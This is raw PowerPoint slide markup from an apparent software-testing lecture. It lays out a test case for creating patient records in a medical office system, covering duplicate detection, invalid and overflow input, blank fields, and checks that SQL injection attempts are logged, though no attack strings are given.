                <a:cs typeface="ヒラギノ角ゴ Pro W3"/>
              </a:rPr>
              <a:t>Testing Software</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow"/>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1C508B2-E8AC-C01F-B345-62C5A6EFEB9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="11"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3934194063"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="520700" y="1600200"/>
          <a:ext cx="8154988" cy="4394589"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" firstCol="1" lastRow="1" lastCol="1" bandRow="1" bandCol="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="8154988">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="525737822"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="355989">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="1200">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Test Case: Create Patient Information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6553293"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="355989">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="1200">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Test Case ID: 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3863172"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="3326622">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Test Purpose:</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="342900" marR="0" lvl="0" indent="-342900" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="+mj-lt"/>
                        <a:buAutoNum type="arabicPeriod"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Ensure a valid new client can be entered into the system, and the appropriate tabs are created.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="342900" marR="0" lvl="0" indent="-342900" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="+mj-lt"/>
                        <a:buAutoNum type="arabicPeriod"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Ensure a duplicate entry is not created for an existing patient.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="342900" marR="0" lvl="0" indent="-342900" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="+mj-lt"/>
                        <a:buAutoNum type="arabicPeriod"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Ensure invalid data is detected, including wrong data types, overflow text, overflow math numbers, blank required fields, and inappropriate data.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="342900" marR="0" lvl="0" indent="-342900" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="+mj-lt"/>
                        <a:buAutoNum type="arabicPeriod"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Ensure logs are created for attacks, including overflow, business rule violations and SQL errors or injection.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="342900" marR="0" lvl="0" indent="-342900" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="+mj-lt"/>
                        <a:buAutoNum type="arabicPeriod"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Ensure encrypted transaction log is created documenting the transaction, and the author and time of the transaction.</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25000"/>
                        <a:lumOff val="75000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2134475075"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="355989">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Preconditions:  The tester is logged in at the main menu.</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25000"/>
                        <a:lumOff val="75000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3814338855"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD99A8D3-287E-AD2C-29B3-9B0D231F5525}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Developing a Test Case</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1367061822"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow"/>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B60E22E-7B7D-0508-E1CB-5AA24734E683}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="11"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1547584932"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="520700" y="1519238"/>
          <a:ext cx="8154988" cy="5030978"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" firstCol="1" lastRow="1" lastCol="1" bandRow="1" bandCol="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="8154988">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4000545009"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="4879975">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Flow of Events:</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="342900" marR="0" lvl="0" indent="-342900" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="+mj-lt"/>
                        <a:buAutoNum type="arabicPeriod"/>
                        <a:tabLst>
                          <a:tab pos="457200" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>The tester selects “Manage Patient” or as an extension to Make Appointment</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="342900" marR="0" lvl="0" indent="-342900" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="+mj-lt"/>
                        <a:buAutoNum type="arabicPeriod"/>
                        <a:tabLst>
                          <a:tab pos="457200" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>The tester: enters last and first name for an existing patient and presses ‘Create’.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="342900" marR="0" lvl="0" indent="-342900" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="+mj-lt"/>
                        <a:buAutoNum type="arabicPeriod"/>
                        <a:tabLst>
                          <a:tab pos="457200" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>While the system finds a matching record</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="742950" marR="0" lvl="1" indent="-285750" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="+mj-lt"/>
                        <a:buAutoNum type="arabicPeriod"/>
                        <a:tabLst>
                          <a:tab pos="914400" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>The system should display an error message: “Match Exists”, and requests the tester revise the information.  </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="742950" marR="0" lvl="1" indent="-285750" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="+mj-lt"/>
                        <a:buAutoNum type="arabicPeriod"/>
                        <a:tabLst>
                          <a:tab pos="914400" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>The tester changes the name to a new patient name.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="342900" marR="0" lvl="0" indent="-342900" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="+mj-lt"/>
                        <a:buAutoNum type="arabicPeriod"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>The system should display multiple tabs, including Patient Information (Form 6.2, Patient Medical History (Form 6.3), and Patient Medical Information (Form 6.4).</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="342900" marR="0" lvl="0" indent="-342900" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="+mj-lt"/>
                        <a:buAutoNum type="arabicPeriod"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>The system should rename the ‘Create’ button into the ‘Save’ button.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRP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tester enters inappropriate data types according to business rules for each field of the new Patient data and presses ‘Save’. </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system should recognize the invalid information and gives error messages.</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tester enters too much information for text strings or overflow data for arithmetic fields for each field of the new Patient and presses ‘Save’. </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system should recognize the overflow, provide error messages, remain on the same page, and log the error(s).</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tester leaves required fields empty for the new Patient and presses ‘Save’. </a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="52698" marR="52698" marT="0" marB="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="25000"/>
                        <a:lumOff val="75000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1240873934"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A442F62-B8F0-418B-2481-889631519243}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test Case: Flow of Events</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="282938521"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow"/>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B60E22E-7B7D-0508-E1CB-5AA24734E683}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="11"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3590218584"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="520700" y="1519238"/>
          <a:ext cx="8154988" cy="4421187"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" firstCol="1" lastRow="1" lastCol="1" bandRow="1" bandCol="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="8154988">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4000545009"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="4421187">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>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system should recognize the lacking information and gives error messages.</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tester enters inappropriate information (violating business rules) for controlled fields of the new Patient and presses ‘Save’ (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>e.g</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>, illegal state, sex, number of children&gt;10, illegal insurance, etc.) </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system should recognize the errors and give error messages.</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tester enters SQL injection attack into many fields.</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system should recognize the attack, indicate an error, and log the specific command executed.</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tester enters valid information for the new Patient and presses ‘Save’.</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system assigns the patient a patient number and displays:  ‘Record Updated’</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system should create a Patient Plan Management (Form 6.5) tab for Patients with health plans, or a Patient Bill Management tab for Patients without.</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tester confirms the creation of the new tabs and that a new encrypted transaction log saved the new patient record, including who and when the transaction was saved.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="342900" marR="0" lvl="0" indent="-342900">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="+mj-lt"/>
                        <a:buAutoNum type="arabicPeriod"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>The tester confirms that SQL injection attacks and business rule violations are logged.</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2698" marR="52698" marT="0" marB="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="25000"/>
                        <a:lumOff val="75000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1240873934"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A442F62-B8F0-418B-2481-889631519243}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test Case: Flow of Events (continued)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1954895494"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow"/>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1032309-5815-1417-F880-ECB65A00567D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="11"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1848736120"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="520700" y="1600200"/>
          <a:ext cx="8154988" cy="5097653"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" firstCol="1" lastRow="1" lastCol="1" bandRow="1" bandCol="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="8154988">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1454535561"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="2720093">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Business Rules:</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:solidFill>
